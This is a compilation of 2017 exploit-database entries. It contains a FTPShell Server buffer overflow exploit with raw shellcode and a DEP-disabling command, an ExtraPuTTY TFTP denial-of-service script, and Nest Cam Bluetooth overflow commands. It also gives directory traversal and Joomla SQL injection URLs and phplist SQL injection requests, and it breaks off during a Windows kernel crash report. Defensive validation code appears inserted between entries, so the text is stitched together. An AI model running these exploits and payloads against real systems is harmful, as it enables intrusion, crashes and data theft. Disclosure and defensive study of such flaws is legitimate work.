print '''
 
                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: ScR1pTK1dd13.slammer@gmail.com   # 
                ##############################################
 
# Exploit Title: FTPShell Server 6.56 ChangePassword DEP off BufferOverflow 0Day 
# Date: 2017.03.19
# Exploit Author: Greg Priest
# Version: FTPShell Server 6.56
# Tested on: Windows7 x64 HUN/ENG Enterprise
'''

overflow = "A" * 1249
jmp_esp = "\xC8\x28\x3C\x76"
nop = "\x90" * 10
shellcode=(
"\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
"\xa5\x59\x50")

evilstring = overflow+jmp_esp+nop+shellcode
 
 
# write the crafted string to a file so it can be pasted into the password field
file = open('Ev1lstr1ng.txt', "w")
file.write(evilstring)
file.close()

print '''
Instruction how to use it:
-DEP turn off: C:\Windows\system32>bcdedit.exe /set {current} nx AlwaysOff
1)Manage FTP Account-->
2)Change pass Ev1lstr1ng.txt -->
3)Do you really change...? --> click NO!!
Succesfully Exploitation!!
 
'''
            
# Exploit Title: HttpServer 1.0 DolinaySoft Directory Traversal
# Date: 2017-03-19
# Exploit Author: malwrforensics
# Software Link: http://www.softpedia.com/get/Internet/Servers/WEB-Servers/HttpServer.shtml#download
# Version: 1.0
# Tested on: Windows

Exploiting this issue will allow an attacker to view arbitrary files
within the context of the web server.

Example:
Assuming the root folder is c:\<app_folder>\<html_folder>

http://<server>/..%5c..%5c/windows/win.ini
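The check a static file server needs here, as an added example in Python (not DolinaySoft code): percent-decode the request path first, treat a backslash the way Windows does (as a separator), normalise against the document root and refuse anything that lands outside it. `DOC_ROOT` is an assumed POSIX-style root standing in for the advisory's `c:\<app_folder>\<html_folder>`; the logic is the same on either platform.

```python
"""Defensive path resolution for a static file server (added example)."""
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/srv/www/html"   # assumed document root


class TraversalError(PermissionError):
    pass


def resolve_request_path(url_path: str, doc_root: str = DOC_ROOT) -> str:
    """Map a URL path to a filesystem path, or raise if it escapes doc_root."""
    decoded = unquote(url_path)                  # %5c -> "\", %2e -> "."
    if "\0" in decoded:
        raise TraversalError("NUL byte in request path")
    unified = decoded.replace("\\", "/")         # Windows accepts both separators
    root = posixpath.normpath(doc_root)
    candidate = posixpath.normpath(posixpath.join(root, unified.lstrip("/")))
    # normpath has already folded every ".." segment; anything that is not the
    # root itself or below it was a traversal attempt
    if candidate != root and not candidate.startswith(root + "/"):
        raise TraversalError(f"{url_path!r} resolves outside the document root")
    return candidate


def is_allowed(url_path: str) -> bool:
    """True when the request would be served from inside the document root."""
    try:
        resolve_request_path(url_path)
        return True
    except TraversalError:
        return False


if __name__ == "__main__":
    for path in ("/index.html", "/docs/../index.html", "/..%5c..%5c/windows/win.ini"):
        print(path, "->", "allowed" if is_allowed(path) else "refused")
```

Decoding before the check matters: a comparison on the raw `..%5c` string never sees a separator, which is exactly how the traversal above slips past a naive filter.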
            
[+] Credits: John Page AKA hyp3rlinx	
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/EXTRAPUTTY-TFTP-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec            
 


Vendor:
==================
www.extraputty.com



Product:
======================
ExtraPuTTY - v029_RC2
hash: d7212fb5bc4144ef895618187f532773

Also Vulnerable: v0.30 r15
hash: eac63550f837a98d5d52d0a19d938b91

ExtraPuTTY is a fork from 0.67 version of PuTTY.
ExtraPuTTY has all the features from the original soft and adds others.

Below a short list of the principal features (see all features):
DLL frontend
TestStand API ( LabWindows ,TestStand 2012)
timestamp
StatusBar
Scripting a session with lua 5.3.
Automatic sequencing of commands.
Shortcuts for pre-defined commands.
Keyboard shortcuts for pre-defined command
Portability (use of directories structure)
Integrates FTP, TFTP, SCP, SFTP, Ymodem and Xmodem transfer protocols
Integrates PuTTYcyg,PuTTYSC, HyperLink, zmodem and session manager projects
Change default settings from configuration file
Change putty settings during session
PuTTYcmdSender : tool to send command or keyboard shortcut to multiple putty windows


Vulnerability Type:
=======================
TFTP Denial of Service



CVE Reference:
==============
CVE-2017-7183



Security Issue:
================
TFTP server component of ExtraPuTTY is vulnerable to remote Denial of Service attack by sending large junk UDP
Read/Write TFTP protocol request packets. 

Open ExtraPuTTY Session Manager, select => Files Transfer => TFTP Server, then run the Python exploit below.

Then, BOOM

(100c.30c): Access violation - code c0000005 (first/second chance not available)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for kernel32.dll - 
eax=00000000 ebx=0929ee98 ecx=00000174 edx=7efefeff esi=00000002 edi=00000000
eip=77b4015d esp=0929ee48 ebp=0929eee4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
ntdll!ZwWaitForMultipleObjects+0x15:



Exploit/POC:
=============
import socket

print "ExtraPuTTY v029_RC2 TFTP Server"
print "Remote Denial Of Service 0day Exploit"
print "John Page AKA hyp3rlinx\n"

TARGET=raw_input("[IP]>")
TYPE=int(raw_input("[Select DOS Type: Read=1, Write=2]>"))
CRASH="A"*2000                     
PORT = 69

if TYPE==1:
    PAYLOAD = "\x00\x01"                 # RRQ opcode
    PAYLOAD += CRASH + "\x00"            # oversized filename, NUL terminated
    PAYLOAD += "netascii\x00"            # transfer mode
elif TYPE==2:
    PAYLOAD = "\x00\x02"                 # WRQ opcode
    PAYLOAD += CRASH + "\x00"
    PAYLOAD += "netascii\x00"
else:
    print "Unknown DOS type, use 1 or 2"
    raise SystemExit(1)

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(5)
try:
    # well-formed read request for a file named TEST, used only to confirm the server answers
    s.sendto("\x00\x01TEST\x00netascii\x00", (TARGET, PORT))
    recv = s.recvfrom(255)
    if recv != None:
        print "Crashing ExtraPuTTY TFTP server at : %s" %(TARGET)
        s.sendto(PAYLOAD, (TARGET, PORT))
except Exception:
    print 'Server not avail, try later'
finally:
    s.close()
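The receiver-side checks whose absence the advisory describes, as an added Python example (not ExtraPuTTY code): a TFTP read or write request is an opcode followed by two NUL-terminated strings, so the server has to bound the datagram, insist on the terminators and cap the filename before copying anything. The limits are assumptions (516 bytes is the largest data datagram RFC 1350 uses, 255 bytes is a common filename cap); the sample datagrams are constructed here and follow the shape of the probe and payload above.

```python
"""Bounds-checked parser for TFTP RRQ/WRQ packets (added example)."""
import struct

OPCODES = {1: "RRQ", 2: "WRQ"}
MODES = {"netascii", "octet", "mail"}
MAX_DATAGRAM = 516      # assumed cap
MAX_FILENAME = 255      # assumed cap
MAX_MODE = 8            # longest defined mode string is "netascii"


class TftpError(ValueError):
    pass


def _read_cstring(buf: bytes, off: int, limit: int, what: str):
    """Read a NUL-terminated ASCII string, refusing unterminated or oversized ones."""
    end = buf.find(b"\x00", off)
    if end < 0:
        raise TftpError(f"{what}: missing NUL terminator")
    if end - off > limit:
        raise TftpError(f"{what}: length {end - off} exceeds limit {limit}")
    try:
        return buf[off:end].decode("ascii"), end + 1
    except UnicodeDecodeError:
        raise TftpError(f"{what}: non-ASCII bytes") from None


def parse_request(packet: bytes) -> dict:
    """Validate and decode a request datagram; raise TftpError on anything malformed."""
    if len(packet) > MAX_DATAGRAM:
        raise TftpError(f"datagram length {len(packet)} exceeds {MAX_DATAGRAM}")
    if len(packet) < 6:   # opcode + 1-char name + NUL + 1-char mode + NUL
        raise TftpError("datagram too short for a request")
    opcode = struct.unpack(">H", packet[:2])[0]
    if opcode not in OPCODES:
        raise TftpError(f"unsupported opcode {opcode}")
    filename, off = _read_cstring(packet, 2, MAX_FILENAME, "filename")
    if not filename:
        raise TftpError("filename: empty")
    mode, off = _read_cstring(packet, off, MAX_MODE, "mode")
    if mode.lower() not in MODES:
        raise TftpError(f"mode: unknown transfer mode {mode!r}")
    # RFC 2347 options may follow; they are returned raw for a later stage
    return {"op": OPCODES[opcode], "filename": filename,
            "mode": mode.lower(), "options": packet[off:]}


def classify(packet: bytes) -> str:
    """'ok' for an acceptable request, otherwise the reason it would be dropped."""
    try:
        parse_request(packet)
        return "ok"
    except TftpError as exc:
        return str(exc)


# constructed sample datagrams
GOOD_RRQ = b"\x00\x01TEST\x00netascii\x00"
JUNK_RRQ = b"\x00\x01" + b"A" * 2000 + b"\x00netascii\x00"   # shape of the PoC payload
LONG_NAME_WRQ = b"\x00\x02" + b"A" * 300 + b"\x00octet\x00"
UNTERMINATED = b"\x00\x01" + b"B" * 20

if __name__ == "__main__":
    for name, pkt in [("good", GOOD_RRQ), ("junk", JUNK_RRQ),
                      ("long name", LONG_NAME_WRQ), ("unterminated", UNTERMINATED)]:
        print(f"{name:12s} {classify(pkt)}")
```

A server that drops the datagram at the first failing check, and logs the peer address with the reason, turns the crash into a detectable event instead of a restart.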





Network Access:
===============
Remote



Severity:
=========
Medium



Disclosure Timeline:
===============================
Vendor Notification:  No reply
March 20, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
            
# # # # #
# Exploit Title: Joomla! Component JooCart (Joomla OpenCart Integration) v2.x - SQL Injection
# Google Dork: N/A
# Date: 20.03.2017
# Vendor Homepage: http://soft-php.com
# Software: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=4478
# Demo: http://demo.soft-php.com
# Version: 2.x
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_opencart&route=product/product&product_id=[SQL]
# # # # #
            
# # # # #
# Exploit Title: Joomla! Component jCart for OpenCart v2.0 - SQL Injection
# Google Dork: N/A
# Date: 20.03.2017
# Vendor Homepage: http://soft-php.com
# Software: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/jcart-for-opencart/
# Demo: http://demos.soft-php.com/jcart/
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jcart&route=product/product&product_id=[SQL]
# # # # #
            
# Exploit Title: Google Nest Cam - Multiple Buffer Overflow Conditions Over Bluetooth LE
# Reported to Google: October 26, 2016

# Public Disclosure: March 17, 2017
# Exploit Author: Jason Doyle @_jasondoyle
# Vendor Homepage: https://nest.com/
# Affected: Dropcam, Dropcam Pro, Nest Cam Indoor/Outdoor models

# Tested Version: 5.2.1

# Fixed Version: TBD
# https://github.com/jasondoyle/Google-Nest-Cam-Bug-Disclosures/blob/master/README.md


==Bluetooth (BLE) based Buffer Overflow via SSID parameter==

1. Summary


It's possible to trigger a buffer overflow condition when setting the SSID parameter on the camera. The attacker must be in Bluetooth range at any time while the camera is powered on. Bluetooth is never disabled, even after initial setup.

2. Proof of Concept


anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I

[18:B4:30:5D:00:B8][LE]> connect

Attempting to connect to 18:B4:30:5D:00:B8

Connection successful

[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a031201AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3b

Characteristic value was written successfully

Characteristic value was written successfully

[18:B4:30:5D:00:B8][LE]>
(gatttool:20352): GLib-WARNING **: Invalid file descriptor.

3. Details 

The payload declares an SSID length of 1 byte but sends 16 bytes of value.
SequenceNum=3a + Type=0312 + Length=01 + Value=AA*16

4. Result


Crash and reboot back to operational state


==Bluetooth (BLE) based Buffer Overflow via Encrypted Password parameter==

1. Summary


It's possible to trigger a buffer overflow condition when setting the encrypted password parameter on the camera. The attacker must be in Bluetooth range at any time while the camera is powered on. Bluetooth is never disabled, even after initial setup.

2. Proof of Concept


anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I

[18:B4:30:5D:00:B8][LE]> connect

Attempting to connect to 18:B4:30:5D:00:B8

Connection successful

[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a03120b506574536d6172742d356e1a01AAAAAA

[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3b

Characteristic value was written successfully

Characteristic value was written successfully

[18:B4:30:5D:00:B8][LE]>
(gatttool:20352): GLib-WARNING **: Invalid file descriptor.

3. Details


The payload declares an encrypted Wi-Fi password length of 1 byte but sends 3 bytes of value.
SequenceNum=3a + Type=0312 + Length=0b + ssidVal=506574536d6172742d356e + type=1a + length=01 + encPass=AA*3
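Both writes above exploit the same gap: the declared length of a field and the number of bytes actually supplied disagree, and the receiver trusts one while copying by the other. The following strict parser, an added Python example and not Nest firmware, walks the frame exactly as the page annotates it (SequenceNum 1 byte, Type 2 bytes, Length 1 byte, Value; nested fields with a 1-byte type) and rejects any field whose declared length does not fit the bytes that remain or exceeds a cap. The field widths and the 32-byte cap (the 802.11 SSID maximum) are assumptions; the two PoC hex strings are those shown in the sections above.

```python
"""Strict length-prefixed frame parser for the BLE setup writes (added example)."""

MAX_VALUE = 32   # 802.11 SSIDs are at most 32 octets; used as the cap for every value


class FrameError(ValueError):
    pass


def _read_field(frame: bytes, off: int, type_width: int):
    """Read one type|length|value field, checking the length against what remains."""
    if off + type_width + 1 > len(frame):
        raise FrameError(f"field header truncated at offset {off}")
    ftype = int.from_bytes(frame[off:off + type_width], "big")
    length = frame[off + type_width]
    start = off + type_width + 1
    if length > MAX_VALUE:
        raise FrameError(f"type 0x{ftype:x}: declared length {length} exceeds {MAX_VALUE}")
    if start + length > len(frame):
        raise FrameError(f"type 0x{ftype:x}: declared length {length} but only "
                         f"{len(frame) - start} bytes remain")
    return ftype, frame[start:start + length], start + length


def parse_frame(frame: bytes) -> dict:
    """Decode seq byte plus fields; every byte must belong to a well-formed field."""
    if not frame:
        raise FrameError("empty frame")
    seq = frame[0]
    fields = []
    off = 1
    type_width = 2          # first field carries the 2-byte type per the annotation
    while off < len(frame):
        ftype, value, off = _read_field(frame, off, type_width)
        fields.append((ftype, value))
        type_width = 1      # nested fields use a 1-byte type (assumption)
    return {"seq": seq, "fields": fields}


def is_well_formed(hex_frame: str) -> bool:
    """True only when the whole frame parses with consistent lengths."""
    try:
        parse_frame(bytes.fromhex(hex_frame))
        return True
    except (FrameError, ValueError):
        return False


# frames from the two PoCs above, plus consistent counterparts constructed here
POC_SSID = "3a031201" + "AA" * 16
POC_ENCPASS = "3a03120b506574536d6172742d356e1a01AAAAAA"
GOOD_SSID = "3a031203616263"                              # SSID "abc"
GOOD_ENCPASS = "3a03120b506574536d6172742d356e1a03AAAAAA"  # password length matches

if __name__ == "__main__":
    for name, frame in [("PoC SSID", POC_SSID), ("PoC encPass", POC_ENCPASS),
                        ("good SSID", GOOD_SSID), ("good encPass", GOOD_ENCPASS)]:
        print(f"{name:13s} {'accepted' if is_well_formed(frame) else 'rejected'}")
```

In the first PoC the parser accepts the one declared byte and then chokes on the trailing `AA` bytes, which cannot form a valid nested field; in the second it is the password field (declared 1, supplied 3) that leaves unexplained bytes. Either way the write is refused before any copy happens.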
            
1. Introduction

Affected Product:	phplist 3.2.6
Fixed in:	3.3.1
Fixed Version Link:	https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/download
Vendor Website:	https://www.phplist.org/
Vulnerability Type:	SQL Injection
Remote Exploitable:	Yes
Reported to vendor:	01/10/2017
Disclosed to public:	02/20/2017
Release mode:	Coordinated Release
CVE:	n/a (not requested)
Credits	Tim Coen of Curesec GmbH

2. Overview

phplist is an application to manage newsletters, written in PHP. In version 3.2.6, it is vulnerable to SQL injection.

The application contains two SQL injections, one of which is in the administration area and one which requires no credentials. Additionally, at least one query is not properly protected against injections. Furthermore, a query in the administration area discloses some information on the password hashes of users.


3. Details

SQL Injection 1: Edit Subscription

CVSS: High 7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

It is possible for an unauthenticated user to perform an SQL injection when updating the subscription information of an already subscribed user.

The protection against SQL injection relies on a combination of a custom magic quotes function which applies addslashes to all input values and a function which applies htmlspecialchars to all inputs. Additionally, some input values are cast to integers to prevent injections. addslashes protects against injections into arguments which are placed into single quotes, while htmlspecialchars protects against injections into double quotes.

It should be noted that neither addslashes nor htmlspecialchars are recommended to prevent SQL Injection.

The update functionality is vulnerable to SQL injection because it interpolates the key of the POST array into the query, and the magic-quotes layer applies addslashes only to POST values, not to keys.

Proof of Concept:

POST /lists/index.php?p=subscribe&uid=f8082b7cc4da7f94ba42d88ebfb5b1e2&email=foo%40example.com HTTP/1.1
Host: localhost
Connection: close
Content-Length: 209
       
email=foo%40example.com&emailconfirm=foo%40example.com&textemail=1&list%5B2 or extractvalue(1,version()) %5D=signup&listname%5B2%5D=newsletter&VerificationCodeX=&update=Subscribe+to+the+selected+newsletters%27

The proof of concept is chosen for simplicity and will only work if error messages are displayed to the user. If this is not the case, other techniques can be used to extract data from the database.

Code:

/lists/admin/subscribelib2.php
$lists = '';
if (is_array($_POST['list'])) {
	while (list($key, $val) = each($_POST['list'])) {
    	if ($val == 'signup') {
        	$result = Sql_query("replace into
			{$GLOBALS['tables']['listuser']} (userid,listid,entered)
			values($userid,$key,now())");
			# $lists .= "  * ".$_POST["listname"][$key]."\n";
		}
	}
}


SQL Injection 2: Sending Campaign (Admin)

CVSS: Medium 4.7 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

When sending a campaign, the sendformat parameter is vulnerable to SQL injection. The injection takes place into an UPDATE, so the easiest way to extract data is via error based SQL injection.

An account with the right to send campaigns is required to exploit this issue.

Proof of Concept:

POST /lists/admin/?page=send&id=2&tk=c&tab=Format HTTP/1.1
Host: localhost
Cookie: PHPSESSID=k6m0jgl4niq7643hohik5jgm12
Connection: close
Content-Length: 323
       
formtoken=27211e65922b95d986bfaf706ccd2ca0&workaround_fck_bug=1&followupto=http%3A%2F%2Flocalhost%2Flists%2Fadmin%2F%3Fpage%3Dsend%26id%3D2%26tk%3Dc%26tab%3DScheduling&htmlformatted=auto&sendformat=HTML"
or extractvalue(1,version()) -- -
&id=2&status=draft&id=2&status=draft&campaigntitle=campaign+meta%27%22%3E&testtarget=

Code:

// /lists/admin/send_core.php:198
$result = Sql_Query(
	sprintf('update %s  set
		subject = "%s", fromfield = "%s", tofield = "%s",
		replyto ="%s", embargo = "%s", repeatinterval = "%s",
		repeatuntil = "%s",
		message = "%s", textmessage = "%s", footer = "%s", status = "%s",
		htmlformatted = "%s", sendformat  = "%s", template  =  "%s"
		where id = %d',
		$tables['message'],
		sql_escape(strip_tags($messagedata['campaigntitle'])),
		/* we store the title in the subject field. Better would
		be to rename the DB column, but this will do for now */
		sql_escape($messagedata['fromfield']),
		sql_escape($messagedata['tofield']),
		sql_escape($messagedata['replyto']),
		sprintf('%04d-%02d-%02d %02d:%02d',
			$messagedata['embargo']['year'],
			$messagedata['embargo']['month'], $messagedata['embargo']['day'],
			$messagedata['embargo']['hour'],
			$messagedata['embargo']['minute']), 
		$messagedata['repeatinterval'],
		sprintf('%04d-%02d-%02d %02d:%02d',
			$messagedata['repeatuntil']['year'],
			$messagedata['repeatuntil']['month'],
			$messagedata['repeatuntil']['day'],
			$messagedata['repeatuntil']['hour'],
			$messagedata['repeatuntil']['minute']),
		sql_escape($messagedata['message']),
		sql_escape($messagedata['textmessage']),
		sql_escape($messagedata['footer']),
		sql_escape($messagedata['status']), $htmlformatted ? '1'
		: '0', $messagedata['sendformat'],
		sql_escape($messagedata['template']), $id
	)
);

Sort By: Password (Admin)

CVSS: Low 2.2 CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N

When viewing users, the sortby parameter can be used to sort the list. The drop down list allows sorting by email, dates, and so on. All non-word characters are removed, but there are no further checks.

It is possible to gather some information on the password of users via this parameter, as it is possible to set it to sort by password.

By repeatedly changing the password of an existing user, the characters of a password hash could be bruteforced by looking at the position of the user the attacker controls.

An account with the right to view users is required to exploit this issue.

Proof of Concept:

http://localhost//lists/admin/?page=users&start=0&find=&findby=&sortby=password&sortorder=desc&change=Go&id=0&find=&findby=email
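A column name cannot be bound as a query parameter, so the only robust defence for a sort parameter is an allowlist of the columns the drop-down actually offers. The added Python example below (not phplist code) puts the page's "strip non-word characters" check beside an allowlist check; the column set is assumed and deliberately omits password.

```python
"""Allowlisting an ORDER BY column (added example)."""
import re

SORTABLE_COLUMNS = ("email", "entered", "modified", "confirmed")   # assumed set


def sortby_strip_only(param: str) -> str:
    """The weak check described above: non-word characters removed, nothing else."""
    return re.sub(r"\W", "", param)


def sortby_allowlisted(param: str, default: str = "email") -> str:
    """The robust check: exact match against the allowlist, otherwise a safe default."""
    return param if param in SORTABLE_COLUMNS else default


def users_query(sortby: str, sortorder: str) -> str:
    """Build the listing query; the direction is likewise reduced to two literals."""
    order = "desc" if sortorder.lower() == "desc" else "asc"
    return f"select id, email from user order by {sortby} {order}"


if __name__ == "__main__":
    print(users_query(sortby_strip_only("password"), "desc"))    # sorts by the hash
    print(users_query(sortby_allowlisted("password"), "desc"))   # falls back to email
```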


Insufficient Protection against SQL Injection

CVSS: n/a

When subscribing a user, metadata is saved in the database. When saving this data in the database, it is neither properly escaped nor are prepared statements used, but the input is HTML encoded.

Because of this, an unauthenticated user has control over part of the query.

This issue is not currently exploitable, but may be exploitable if changes are made to the query. The approach of HTML encoding instead of using prepared statements to defend against SQL injection is also more error prone and may result in further queries which are vulnerable.

A user can create a database error with the following request:

POST /lists/index.php?p=subscribe&id=a\ HTTP/1.1
Host: localhost
Cookie: PHPSESSID=8h5fh18cqe41a2l1t6224tf9v4
Connection: close
           
formtoken=5bf7774ff0f2e396081dc1478cd92201&makeconfirmed=0&email=foo%40example.com&emailconfirm=foo%40example.com&textemail=1&list%5B2%5D=signup&listname%5B2%5D=newsletter&VerificationCodeX=&subscribe=Subscribe+to+the+selected+newsletters%27


The resulting query is:

insert into phplist_user_user_history (ip,userid,date,summary,detail,systeminfo)
values("127.0.0.1",2,now(),"Re-Subscription","[...]","
    HTTP_USER_AGENT = [...]
    REQUEST_URI = /lists/index.php?p=subscribe&id=a\")

It can be seen that the slash in the request escapes the quote of the query which causes an error.
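The three findings above (SQL Injection 1, SQL Injection 2 and the insufficiently protected history insert) share one root cause: the query text is assembled from request data and the escaping layer covers only some of it. The added Python example below, which is not phplist code and uses SQLite with simplified table names, reproduces each pattern as a string builder so the unescaped piece is visible, then shows the hardened form with an integer cast for the list key and bound parameters for every value.

```python
"""Value-only escaping versus bound parameters (added example)."""
import html
import sqlite3


def addslashes(s: str) -> str:
    """Python port of PHP addslashes(): escapes backslash, both quotes and NUL."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))


def magic_quotes(post: dict) -> dict:
    """The custom magic-quotes layer: every value is escaped, no key is."""
    return {k: addslashes(v) for k, v in post.items()}


def build_listuser_replace(userid: int, post_list: dict) -> list:
    """Injection 1 pattern: the POST array key lands in the query untouched."""
    queries = []
    for key, val in magic_quotes(post_list).items():
        if val == "signup":
            queries.append(f"replace into listuser (userid,listid,entered) "
                           f"values({userid},{key},now())")
    return queries


def build_message_update(status: str, sendformat: str) -> str:
    """Injection 2 pattern: status goes through sql_escape, sendformat does not."""
    return (f'update message set status = "{addslashes(status)}", '
            f'sendformat = "{sendformat}" where id = 2')


def build_history_insert(request_uri: str) -> str:
    """Insufficient-protection pattern: HTML encoding leaves a backslash alone."""
    return ('insert into user_history (detail) values("REQUEST_URI = '
            f'{html.escape(request_uri)}")')


def fresh_db() -> sqlite3.Connection:
    """In-memory schema standing in for the phplist tables (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table listuser (userid int, listid int, entered text, "
                 "primary key (userid, listid))")
    conn.execute("create table message (id int primary key, status text, sendformat text)")
    conn.execute("insert into message values (2, 'draft', 'text')")
    return conn


def subscribe_safe(conn: sqlite3.Connection, userid: int, post_list: dict) -> int:
    """Hardened Injection 1: list id cast to int, everything else bound."""
    added = 0
    for key, val in post_list.items():
        if val != "signup":
            continue
        listid = int(key)          # ValueError on anything but an integer
        conn.execute("insert or replace into listuser (userid, listid, entered) "
                     "values (?, ?, datetime('now'))", (userid, listid))
        added += 1
    return added


def update_message_safe(conn: sqlite3.Connection, status: str, sendformat: str, msg_id: int) -> str:
    """Hardened Injection 2: all values bound, so quotes in them are just data."""
    conn.execute("update message set status = ?, sendformat = ? where id = ?",
                 (status, sendformat, msg_id))
    return conn.execute("select sendformat from message where id = ?", (msg_id,)).fetchone()[0]


def safe_subscribe_listids(post_list: dict) -> list:
    """Run subscribe_safe on a fresh database and return the list ids stored."""
    conn = fresh_db()
    subscribe_safe(conn, 7, post_list)
    return [row[0] for row in conn.execute("select listid from listuser order by listid")]


def safe_rejects_key(key: str) -> bool:
    """True when the hardened path refuses a non-integer list key."""
    try:
        subscribe_safe(fresh_db(), 7, {key: "signup"})
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print(build_listuser_replace(7, {"2 or 1=1": "signup"})[0])
    print(build_message_update("draft", 'HTML" or 1=1 -- -'))
    print(build_history_insert("/lists/index.php?p=subscribe&id=a\\"))
    print(safe_subscribe_listids({"2": "signup", "3": "no"}), safe_rejects_key("2 or 1=1"))
```

The history-insert builder ends with the backslash immediately before the closing quote, which is the malformed query the advisory shows; html.escape never touches backslashes, so it is the wrong tool for that job regardless of whether the query happens to be exploitable today.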


4. Solution

To mitigate this issue please upgrade at least to version 3.3.1:

https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/download

Please note that a newer version might already be available.


5. Report Timeline

01/10/2017	Informed Vendor about Issue
01/16/2017	Vendor confirms
02/15/2017	Asked Vendor to confirm that new release fixes issues
02/15/2017	Vendor confirms
02/20/2017	Disclosed to public
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=993

We have encountered Windows kernel crashes in the internal nt!HvpGetBinMemAlloc and nt!ExpFindAndRemoveTagBigPages functions while loading corrupted registry hive files. We believe both crashes to be caused by the same bug. Examples of crash log excerpts generated after triggering the bug are shown below:

---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: a2b23004, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 817f7f04, If non-zero, the instruction address which referenced the bad memory
	address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

[...]

STACK_TEXT:  
a3c0b70c 818b68d0 a06529c8 a0652fd8 a06529c8 nt!HvpGetBinMemAlloc+0x8
a3c0b73c 817f113e 00000001 80000580 80000578 nt!HvFreeHive+0x11c
a3c0b798 817c4fac a3c0b828 00000002 00000000 nt!CmpInitializeHive+0x5e6
a3c0b85c 817c5d91 a3c0bbb8 00000000 a3c0b9f4 nt!CmpInitHiveFromFile+0x1be
a3c0b9c0 817cdaba a3c0bbb8 a3c0ba88 a3c0ba0c nt!CmpCmdHiveOpen+0x50
a3c0bacc 817c63c4 a3c0bb90 a3c0bbb8 00000010 nt!CmLoadKey+0x459
a3c0bc0c 8165cdb6 002efa0c 00000000 00000010 nt!NtLoadKeyEx+0x56c
a3c0bc0c 77796c74 002efa0c 00000000 00000010 nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
002efa74 00000000 00000000 00000000 00000000 0x77796c74
---

and

---
BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the current request.
This may or may not be due to the caller.
The internal pool links must be walked to figure out a possible cause of
